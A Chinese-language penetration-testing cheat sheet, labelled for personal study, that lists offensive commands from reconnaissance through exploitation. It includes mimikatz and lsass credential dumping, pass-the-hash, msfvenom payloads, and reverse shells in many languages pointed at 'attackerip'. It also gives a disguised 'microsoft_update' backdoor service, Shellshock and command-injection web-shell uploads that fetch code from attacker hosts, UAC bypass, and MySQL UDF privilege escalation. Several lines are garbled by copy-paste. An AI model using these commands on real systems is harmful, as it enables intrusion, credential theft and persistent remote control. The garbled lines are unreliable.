本文章只用于个人学习
最好的 NMAP 扫描策略
$ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24
$ grep “Status: Up” Discovery.gnmap | cut -f 2 -d ’ ’ > LiveHosts.txt
$ nmap -sS -T4 -Pn -oG TopTCP -iL LiveHosts.txt
$ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt
$ nmap -sS -T4 -Pn –top-ports 3674 -oG 3674 -iL LiveHosts.txt
$ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt
$ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt
grep "open" FullTCP|cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' |xargs | sed 's/ /,/g'|awk '{print "T:" grep "open" FullTCP|cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' |xargs | sed 's/ /,/g'|awk '{print "T:" 0}’
grep "open" FullUDP|cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' |xargs | sed 's/ /,/g'|awk '{print "U:" grep "open" FullUDP|cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' |xargs | sed 's/ /,/g'|awk '{print "U:" 0}’
$ nmap -sV -T4 -Pn -oG ServiceDetect -iL LiveHosts.txt
$ nmap -O -T4 -Pn -oG OSDetect -iL LiveHosts.txt
$ nmap -O -sV -T4 -Pn -p U:53,111,137,T:21-25,80,139,8080 -oG OS_Service_Detect -iL LiveHosts.txt
Nmap – 躲避防火墙
$ nmap -f
$ nmap –mtu 24
$ nmap -D RND:10 [target]
$ nmap -D decoy1,decoy2,decoy3 etc.
$ nmap -sI [Zombie IP] [Target IP]
$ nmap –source-port 80 IP
$ nmap –data-length 25 IP
$ nmap –spoof-mac Dell/Apple/3Com IP
Nmap 进行 Web 漏洞扫描
cd /usr/share/nmap/scripts/
wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz
nmap -sS -sV –script=vulscan/vulscan.nse target
nmap -sS -sV –script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv target
nmap -sS -sV –script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 target
nmap -PN -sS -sV –script=vulscan –script-args vulscancorrelation=1 -p80 target
nmap -sV –script=vuln target
nmap -PN -sS -sV –script=all –script-args vulscancorrelation=1 target
使用 DIRB 爆破目录
注:DIRB 是一个专门用于爆破目录的工具,在 Kali 中默认已经安装,类似工具还有国外的patator,dirsearch,DirBuster,
国内的御剑等等。
dirb http://IP:PORT /usr/share/dirb/wordlists/common.txt
Patator – 全能暴力破解测试工具
$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst
$ patator smtp_login host=192.168.17.129 user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
$ patator smtp_login host=192.168.17.129 helo=’ehlo 192.168.17.128’ user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst -x ignore:fgrep=’incorrect password or account name’
使用 Fierce 爆破 DNS
注:Fierce 会检查 DNS 服务器是否允许区域传送。如果允许,就会进行区域传送并通知用户,如果不允许,则可以通过查询 DNS 服务器枚举主机名。类似工具:subDomainsBrute 和
SubBrute 等等
$ ./fierce.pl -dns example.com
$ ./fierce.pl –dns example.com –wordlist myWordList.txt
使用 Nikto 扫描 Web 服务
nikto -C all -h http://IP
扫描 WordPress
git clone https://github.com/wpscanteam/wpscan.git && cd wpscan
./wpscan –url http://IP/ –enumerate p
HTTP 指纹识别
wget http://www.net-square.com/_assets/httprint_linux_301.zip && unzip httprint_linux_301.zip
cd httprint_301/linux/
./httprint -h http://IP -s signatures.txt
使用 Skipfish 扫描
注:Skipfish 是一款 Web 应用安全侦查工具,Skipfish 会利用递归爬虫和基于字典的探针生成一幅交互式网站地图,最终生成的地图会在通过安全检查后输出。
skipfish -m 5 -LY -S /usr/share/skipfish/dictionaries/complete.wl -o ./skipfish2 -u http://IP
使用 NC 扫描
nc -v -w 1 target -z 1-1000
for i in {101..102}; do nc -vv -n -w 1 192.168.56.$i 21-25 -z; done
Unicornscan
注:Unicornscan 是一个信息收集和安全审计的工具。
us -H -msf -Iv 192.168.56.101 -p 1-65535
us -H -mU -Iv 192.168.56.101 -p 1-65535
-H 在生成报告阶段解析主机名
-m 扫描类型 (sf - tcp, U - udp)
-Iv - 详细
使用 Xprobe2 识别操作系统指纹
xprobe2 -v -p tcp:80:open IP
枚举 Samba
nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U “” target
enum4linux target
枚举 SNMP
snmpget -v 1 -c public IP
snmpwalk -v 1 -c public IP
snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP
实用的 Windows cmd 命令
net localgroup Users
net localgroup Administrators
search dir/s *.doc
system(“start cmd.exe /k $cmd”)
sc create microsoft_update binpath=”cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe” start= auto error= ignore
/c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779
mimikatz.exe “privilege::debug” “log” “sekurlsa::logonpasswords”
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe “sekurlsa::minidump lsass.dmp” “log” “sekurlsa::logonpasswords”
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp 32 位系统
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp 64 位系统
PuTTY 连接隧道
转发远程端口到目标地址
plink.exe -P 22 -l root -pw “1234” -R 445:127.0.0.1:445 IP
Meterpreter 端口转发
meterpreter > portfwd add –l 3389 –p 3389 –r 172.16.194.141
kali > rdesktop 127.0.0.1:3389
开启 RDP 服务
reg add “hklm\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
关闭 Windows 防火墙
netsh firewall set opmode disable
Meterpreter VNC\RDP
run getgui -u admin -p 1234
run vnc -p 5043
使用 Mimikatz
获取 Windows 明文用户名密码
git clone https://github.com/gentilkiwi/mimikatz.git
privilege::debug
sekurlsa::logonPasswords full
获取哈希值
git clone https://github.com/byt3bl33d3r/pth-toolkit
pth-winexe -U hash //IP cmd
或者
apt-get install freerdp-x11
xfreerdp /u:offsec /d:win2012 /pth:HASH /v:IP
在或者
meterpreter > run post/windows/gather/hashdump
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
msf exploit(psexec) > exploit
meterpreter > shell
使用 Hashcat 破解密码
hashcat -m 400 -a 0 hash /root/rockyou.txt
使用 NC 抓取 Banner 信息
nc 192.168.0.10 80
GET / HTTP/1.1
Host: 192.168.0.10
User-Agent: Mozilla/4.0
Referrer: www.example.com
使用 NC 在 Windows 上反弹 shell
c:>nc -Lp 31337 -vv -e cmd.exe
nc 192.168.0.10 31337
c:>nc example.com 80 -e cmd.exe
nc -lp 80
nc -lp 31337 -e /bin/bash
nc 192.168.0.10 31337
nc -vv -r(random) -w(wait) 1 192.168.0.10 -z(i/o error) 1-1000
查找 SUID\SGID root 文件
find / -user root -perm -4000 -print
find / -group root -perm -2000 -print
find / -perm -4000 -o -perm -2000 -print
find / -nouser -print
find / -nogroup -print
find / -type l -ls
Python shell
python -c ‘import pty;pty.spawn(“/bin/bash”)’
Python\Ruby\PHP HTTP 服务器
python2 -m SimpleHTTPServer
python3 -m http.server
ruby -rwebrick -e “WEBrick::HTTPServer.new(:Port => 8888, :D
ocumentRoot => Dir.pwd).start”
php -S 0.0.0.0:8888
获取进程对应的 PID
fuser -nv tcp 80
fuser -k -n tcp 80
使用 Hydra 爆破 RDP
hydra -l admin -P /root/Desktop/passwords -S X.X.X.X rdp
挂载远程 Windows 共享文件夹
smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
Kali 下编译 Exploit
gcc -m32 -o output32 hello.c (32 位)
gcc -m64 -o output hello.c (64 位)
Kali 下编译 Windows Exploit
wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
wine mingw-get-setup.exe
select mingw32-base
cd /root/.wine/drive_c/windows
wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
wine ability.exe
NASM 命令
注:NASM 全称 The Netwide Assembler,是一款基于80×86和x86-64平台的汇编语言编译程序,其设计初衷是为了实现编译器程序跨平台和模块化的特性。
nasm -f bin -o payload.bin payload.asm
nasm -f elf payload.asm; ld -o payload payload.o; objdump -d payload
SSH 穿透
ssh -D 127.0.0.1:1080 -p 22 user@IP
Add socks4 127.0.0.1 1080 in /etc/proxychains.conf
proxychains commands target
SSH 穿透从一个网络到另一个网络
ssh -D 127.0.0.1:1080 -p 22 user1@IP1
Add socks4 127.0.0.1 1080 in /etc/proxychains.conf
proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2
Add socks4 127.0.0.1 1081 in /etc/proxychains.conf
proxychains commands target
使用 metasploit 进行穿透
route add X.X.X.X 255.255.255.0 1
use auxiliary/server/socks4a
run
proxychains msfcli windows/* PAYLOAD=windows/meterpreter/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E
或者
meterpreter > ipconfig
IP Address : 10.1.13.3
meterpreter > run autoroute -s 10.1.13.0/24
meterpreter > run autoroute -p
10.1.13.0 255.255.255.0 Session 1
meterpreter > Ctrl+Z
msf auxiliary(tcp) > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 10.1.13.2
msf exploit(psexec) > exploit
meterpreter > ipconfig
IP Address : 10.1.13.2
基于 CSV 文件查询 Exploit-DB
git clone https://github.com/offensive-security/exploit-database.git
cd exploit-database
./searchsploit –u
./searchsploit apache 2.2
./searchsploit “Linux Kernel”
cat files.csv | grep -i linux | grep -i kernel | grep -i local | grep -v dos | uniq | grep 2.6 | egrep “<|<=” | sort -k3
MSF Payloads
msfvenom -p windows/meterpreter/reverse_tcp LHOST= X > system.exe
msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=443 R > exploit.php
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -e -a x86 –platform win -f asp -o file.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -e x86/shikata_ga_nai -b “\x00” -a x86 –platform win -f c
MSF 生成在 Linux 下反弹的 Meterpreter Shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=443 -e -f elf -a x86 –platform linux -o shell
MSF 生成反弹 Shell (C Shellcode)
msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b “\x00\x0a\x0d” -a x86 –platform win -f c
MSF 生成反弹 Python Shell
msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py
MSF 生成反弹 ASP Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp -a x86 –platform win -o shell.asp
MSF 生成反弹 Bash Shell
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -o shell.sh
MSF 生成反弹 PHP Shell
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -o shell.php
add
find / -uid 0 -perm -4000
find / -perm -o=w
find / -name ” ” -print
find / -name “..” -print
find / -name “. ” -print
find / -name ” ” -print
find / -nouser
lsof +L1
lsof -i
arp -a
getent passwd
for user in (getent passwd|cut -f1 -d:); do echo "### Crontabs for (getent passwd|cut -f1 -d:); do echo "### Crontabs for user ####”; crontab -u $user -l; done
cat /dev/urandom| tr -dc ‘a-zA-Z0-9-!@#$%^&*()+{}|:<>?=’|fold -w 12| head -n 4
find . | xargs -I file lsattr -a file 2>/dev/null | grep ‘^….i’
chattr -i file
Windows 缓冲区溢出利用命令
msfvenom -p windows/shell_bind_tcp -a x86 –platform win -b “\x00” -f c
msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 -a x86 –platform win -e x86/shikata_ga_nai -b “\x00” -f c
COMMONLY USED BAD CHARACTERS:
\x00\x0a\x0d\x20 For http request
\x00\x0a\x0d\x20\x1a\x2c\x2e\3a\x5c Ending with (0\n\r_)
pattern create
pattern offset (EIP Address)
pattern offset (ESP Address)
add garbage upto EIP value and add (JMP ESP address) in EIP . (ESP = shellcode )
!pvefindaddr pattern_create 5000
!pvefindaddr suggest
!pvefindaddr modules
!pvefindaddr nosafeseh
!mona config -set workingfolder C:\Mona\%p
!mona config -get workingfolder
!mona mod
!mona bytearray -b “\x00\x0a”
!mona pc 5000
!mona po EIP
!mona suggest
SEH – 结构化异常处理
注:SEH(“Structured Exception Handling”),即结构化异常处理,是 windows 操作系统提供给程序设计者的强有力的处理程序错误或异常的武器。
!mona suggest
!mona nosafeseh
nseh=”\xeb\x06\x90\x90” (next seh chain)
iseh= !pvefindaddr p1 -n -o -i (POP POP RETRUN or POPr32,POPr32,RETN)
ROP (DEP)
注:ROP(“Return-Oriented Programming”)是计算机安全漏洞利用技术,该技术允许攻击者在安全防御的情况下执行代码,如不可执行的内存和代码签名。
DEP(“Data Execution Prevention”)是一套软硬件技术,在内存上严格将代码和数据进行区分,防止数据当做代码执行。
!mona modules
!mona ropfunc -m *.dll -cpb “\x00\x09\x0a”
!mona rop -m *.dll -cpb “\x00\x09\x0a” (auto suggest)
ASLR – 地址空间格局随机化
!mona noaslr
寻蛋(EGG Hunter)技术
Egg hunting这种技术可以被归为“分级shellcode”,它主要可以支持你用一小段特制的shellcode来找到你的实际的(更大的)shellcode(我们的‘鸡蛋‘),原理就是通过在内存中搜索我们的最终shellcode。换句话说,一段短代码先执行,然后再去寻找真正的shellcode并执行。– 参考自看雪论坛,更多详情可以查阅我在代码注释中增加的链接。
!mona jmp -r esp
!mona egg -t lxxl
\xeb\xc4 (jump backward -60)
buff=lxxllxxl+shell
!mona egg -t ‘w00t’
GDB Debugger 常用命令
break *_start
next
step
n
s
continue
c
checking ‘REGISTERS’ and ‘MEMORY’
print /d –> Decimal
print /t –> Binary
print /x –> Hex
O/P :
(gdb) print /d $eax
$17 = 13
(gdb) print /t $eax
$18 = 1101
(gdb) print /x $eax
$19 = 0xd
(gdb)
command : x/nyz (Examine)
n –> Number of fields to display ==>
y –> Format for output ==> c (character) , d (decimal) , x (Hexadecimal)
z –> Size of field to be displayed ==> b (byte) , h (halfword), w (word 32 Bit)
BASH 反弹 Shell
bash -i >& /dev/tcp/X.X.X.X/443 0>&1
exec /bin/bash 0&0 2>&0
exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/attackerip/4444 cat <&5 | while read line; do line 2>&5 >&5; done # or: while read line 0<&5; do line 2>&5 >&5; done # or: while read line 0<&5; do line 2>&5 >&5; done
exec 5<>/dev/tcp/attackerip/4444
cat <&5 | while read line; do $line 2>&5 >&5; done # or:
while read line 0<&5; do $line 2>&5 >&5; done
/bin/bash -i > /dev/tcp/attackerip/8080 0<&1 2>&1
/bin/bash -i > /dev/tcp/X.X.X.X/443 0<&1 2>&1
PERL 反弹 Shell
perl -MIO -e ‘ p=fork;exit,if( p = f o r k ; e x i t , i f ( p); c=newIO::Socket::INET(PeerAddr,"attackerip:443");STDIN−>fdopen( c = n e w I O :: S o c k e t :: I N E T ( P e e r A d d r , " a t t a c k e r i p : 443 " ) ; S T D I N − > f d o p e n ( c,r); −>fdopen( − > f d o p e n ( c,w);system$_ while<>;’
perl -MIO -e ‘ c=newIO::Socket::INET(PeerAddr,"attackerip:4444");STDIN−>fdopen( c = n e w I O :: S o c k e t :: I N E T ( P e e r A d d r , " a t t a c k e r i p : 4444 " ) ; S T D I N − > f d o p e n ( c,r); −>fdopen( − > f d o p e n ( c,w);system$_ while<>;’
perl -e ‘use Socket; i="10.0.0.1"; i =" 10.0.0.1 " ; p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in( p,inetaton( p , i n e t a t o n ( i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’
RUBY 反弹 Shell
ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“attackerip”,”443”);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’
ruby -rsocket -e ‘c=TCPSocket.new(“attackerip”,”443”);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’
ruby -rsocket -e ‘f=TCPSocket.open(“attackerip”,”443”).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’
PYTHON 反弹 Shell
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“attackerip”,443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
PHP 反弹 Shell
php -r ‘$sock=fsockopen(“attackerip”,443);exec(“/bin/sh -i <&3 >&3 2>&3”);’
JAVA 反弹 Shell
r = Runtime.getRuntime()
p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/attackerip/443;cat <&5 | while read line; do $line 2>&5 >&5; done”] as String[])
p.waitFor()
NETCAT 反弹 Shell
nc -e /bin/sh attackerip 4444
nc -e /bin/sh 192.168.37.10 443
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip >/tmp/f
TELNET 反弹 Shell
mknod backpipe p && telnet attackerip 443 0
xterm -display 127.0.0.1:1
xhost +targetip
xterm -display attackerip:1
/usr/openwin/bin/xterm -display attackerip:1
or
$ DISPLAY=attackerip:0 xterm
XSS 备忘录
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
(“< iframes > src=http://IP:PORT ”)
‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–>”>’>
“;!–”=&{()}
$ socat SCTP-LISTEN:80,fork TCP:localhost:22
$ socat TCP-LISTEN:1337,fork SCTP:SERVER_IP:80
$ ssh -lusername localhost -D 8080 -p 1337
使用洋葱网络
$ apt-get install tor torsocks
SocksPolicy accept 127.0.0.1
SocksPolicy accept 192.168.0.0/16
Log notice file /var/log/tor/notices.log
RunAsDaemon 1
HiddenServiceDir /var/lib/tor/ssh_hidden_service/
HiddenServicePort 80 127.0.0.1:22
PublishServerDescriptor 0
$ /etc/init.d/tor start
$ cat /var/lib/tor/ssh_hidden_service/hostname
3l5zstvt1zk5jhl662.onion
$ apt-get install torsocks
$ torsocks ssh [email protected] -p 80
Metagoofil – 元数据收集工具
注:Metagoofil 是一款利用Google收集信息的工具。
$ python metagoofil.py -d example.com -t doc,pdf -l 200 -n 50 -o examplefiles -f results.html
利用 Shellshock
$ ./shocker.py -H 192.168.56.118 –command “/bin/cat /etc/passwd” -c /cgi-bin/status –verbose
$ echo -e “HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(
$ echo -e “HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n” | nc 192.168.56.118 80
$ nc -l -p 443
$ echo “HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.56.103 443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n” | nc 192.168.56.118 80
获取 Docker 的 Root
ek@victum:~/docker-test$ id
uid=1001(ek) gid=1001(ek) groups=1001(ek),114(docker)
ek@victum:~$ mkdir docker-test
ek@victum:~$ cd docker-test
ek@victum:~$ cat > Dockerfile
FROM debian:wheezy
ENV WORKDIR /stuff
RUN mkdir -p $WORKDIR
VOLUME [ $WORKDIR ]
WORKDIR $WORKDIR
<< EOF
ek@victum:~$ docker build -t my-docker-image .
ek@victum:~ dockerrun−v d o c k e r r u n − v PWD:/stuff -t my-docker-image /bin/sh -c \
‘cp /bin/sh /stuff && chown root.root /stuff/sh && chmod a+s /stuff/sh’
./sh
whoami
ek@victum:~$ docker run -v /etc:/stuff -t my-docker-image /bin/sh -c ‘cat /stuff/shadow’
使用 DNS 隧道绕过防火墙
$ apt-get update
$ apt-get -y install ruby-dev git make g++
$ gem install bundler
$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/server
$ bundle install
$ ruby ./dnscat2.rb
dnscat2> New session established: 16059
dnscat2> session -i 16059
$ dnscat –host
编译 Assemble 代码
$ nasm -f elf32 simple32.asm -o simple32.o
$ ld -m elf_i386 simple32.o simple32
$ nasm -f elf64 simple.asm -o simple.o
$ ld simple.o -o simple
使用非交互 Shell 打入内网
$ wget -O - -q “http://domain.tk/sh.php?cmd=whoami”
$ wget -O - -q “http://domain.tk/sh.php?cmd=ssh-keygen -f /tmp/id_rsa -N \”\” “
$ wget -O - -q “http://domain.tk/sh.php?cmd=cat /tmp/id_rsa”
$ useradd -m tempuser
$ mkdir /home/tempuser/.ssh && chmod 700 /home/tempuser/.ssh
$ wget -O - -q “http://domain.tk/sh.php?cmd=cat /tmp/id_rsa” > /home/tempuser/.ssh/authorized_keys
$ chmod 700 /home/tempuser/.ssh/authorized_keys
$ chown -R tempuser:tempuser /home/tempuser/.ssh
$ wget -O - -q “http://domain.tk/sh.php?cmd=ssh -i /tmp/id_rsa -o StrictHostKeyChecking=no -R 127.0.0.1:8080:192.168.20.13:8080 -N -f tempuser@”
利用 POST 远程命令执行获取 Shell
attacker:~ curl−i−s−k−X′POST′−−data−binary c u r l − i − s − k − X ′ P O S T ′ − − d a t a − b i n a r y ’IP=%3Bwhoami&submit=submit’ ‘http://victum.tk/command.php’
attacker:~ curl−i−s−k−X′POST′−−data−binary c u r l − i − s − k − X ′ P O S T ′ − − d a t a − b i n a r y ’IP=%3Becho+%27%3C%3Fphp+system%28%24_GET%5B%22cmd%22%5D%29%3B+%3F%3E%27+%3E+..%2Fshell.php&submit=submit’ ‘http://victum.tk/command.php’
attacker:~$ curl http://victum.tk/shell.php?cmd=id
http://victum.tk/shell.php?cmd=php%20-r%20%27file_put_contents%28%22phpshell.php%22,%20fopen%28%22http://attacker.tk/phpshell.txt%22,%20%27r%27%29%29;%27
attacker:~$ nc -nvlp 1337
以管理员身份在 Win7 上反弹具有系统权限的 Shell
msfvenom –p windows/shell_reverse_tcp LHOST=192.168.56.102 –f exe > danger.exe
net user
https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
echo $client = New-Object System.Net.WebClient > script.ps1
echo $targetlocation = “http://192.168.56.102/PsExec.exe” >> script.ps1
echo client.DownloadFile( c l i e n t . D o w n l o a d F i l e ( targetlocation,”psexec.exe”) >> script.ps1
powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script.ps1
echo $client = New-Object System.Net.WebClient > script2.ps1
echo $targetlocation = “http://192.168.56.102/danger.exe” >> script2.ps1
echo client.DownloadFile( c l i e n t . D o w n l o a d F i l e ( targetlocation,”danger.exe”) >> script2.ps1
powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script2.ps1
https://github.com/hfiref0x/UACME
echo $client = New-Object System.Net.WebClient > script2.ps1
echo $targetlocation = “http://192.168.56.102/Akagi64.exe” >> script3.ps1
echo client.DownloadFile( c l i e n t . D o w n l o a d F i l e ( targetlocation,”Akagi64.exe”) >> script3.ps1
powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script3.ps1
nc -lvp 4444
Akagi64.exe 1 C:\Users\User\Desktop\danger.exe
nc -lvp 4444
psexec.exe –i –d –accepteula –s danger.exe
以普通用户身份在 Win7 上反弹具有系统权限的 Shell
https://technet.microsoft.com/en-us/security/bulletin/dn602597.aspx #ms15-051
https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html
https://www.exploit-db.com/exploits/37049/
wmic qfe get
wmic qfe | find “3057191”
https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou64.exe
http://www.ampliasecurity.com/research/windows-credentials-editor/
wce -w
http://www.heise.de/download/pwdump.html
MS08-067 – 不使用 Metasploit
$ nmap -v -p 139, 445 –script=smb-check-vulns –script-args=unsafe=1 192.168.31.205
$ searchsploit ms08-067
$ python /usr/share/exploitdb/platforms/windows/remote/7132.py 192.168.31.205 1
通过 MySQL Root 账户实现提权
$ wget 0xdeadbeef.info/exploits/raptor_udf2.c
$ gcc -g -c raptor_udf2.c
$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
mysql -u root -p
mysql> use mysql;
mysql> create table foo(line blob);
mysql> insert into foo values(load_file(‘/home/user/raptor_udf2.so’));
mysql> select * from foo into dumpfile ‘/usr/lib/mysql/plugin/raptor_udf2.so’;
mysql> create function do_system returns integer soname ‘raptor_udf2.so’;
mysql> select * from mysql.func;
mysql> select do_system(‘echo “root:passwd” | chpasswd > /tmp/out; chown user:user /tmp/out’);
user:~$ su -
Password:
user:~# whoami
root
root:~# id
uid=0(root) gid=0(root) groups=0(root)
使用 LD_PRELOAD 注入程序
$ wget https://github.com/jivoi/pentest/ldpreload_shell.c
$ gcc -shared -fPIC ldpreload_shell.c -o ldpreload_shell.so
$ sudo -u user LD_PRELOAD=/tmp/ldpreload_shell.so /usr/local/bin/somesoft
针对 OpenSSH 用户进行枚举时序攻击
注:枚举时序攻击(“Enumeration Timing Attack”)属于侧信道攻击/旁路攻击(Side Channel Attack),侧信道攻击是指利用信道外的信息,比如加解密的速度/加解密时芯片引脚的电压/密文传输的流量和途径等进行攻击的方式,一个词形容就是“旁敲侧击”。–参考自
shotgun 在知乎上的解释。
osueta 是一个用于对 OpenSSH 进行时序攻击的 python2 脚本,其可以利用时序攻击枚举 OpenSSH 用户名,并在一定条件下可以对 OpenSSH 服务器进行 DOS 攻击。
$ ./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes
$ ./osueta.py -H 192.168.10.22 -p 22 -d 15 -v yes –dos no -L userfile.txt
使用 ReDuh 构造合法的 HTTP 请求以建立 TCP 通道
注: ReDuh 是一个通过 HTTP 协议建立隧道传输各种其他数据的工具。其可以把内网服务器的端口通过 http/https 隧道转发到本机,形成一个连通回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。
对了亲~ReDuh-Gui 号称端口转发神器哦。
$ http://192.168.10.50/uploads/reDuh.jsp
$ java -jar reDuhClient.jar http://192.168.10.50/uploads/reDuh.jsp
$ nc -nvv 127.0.0.1 1010
[createTunnel] 7777:172.16.0.4:3389
$ /usr/bin/rdesktop -g 1024x768 -P -z -x l -k en-us -r sound:off localhost:7777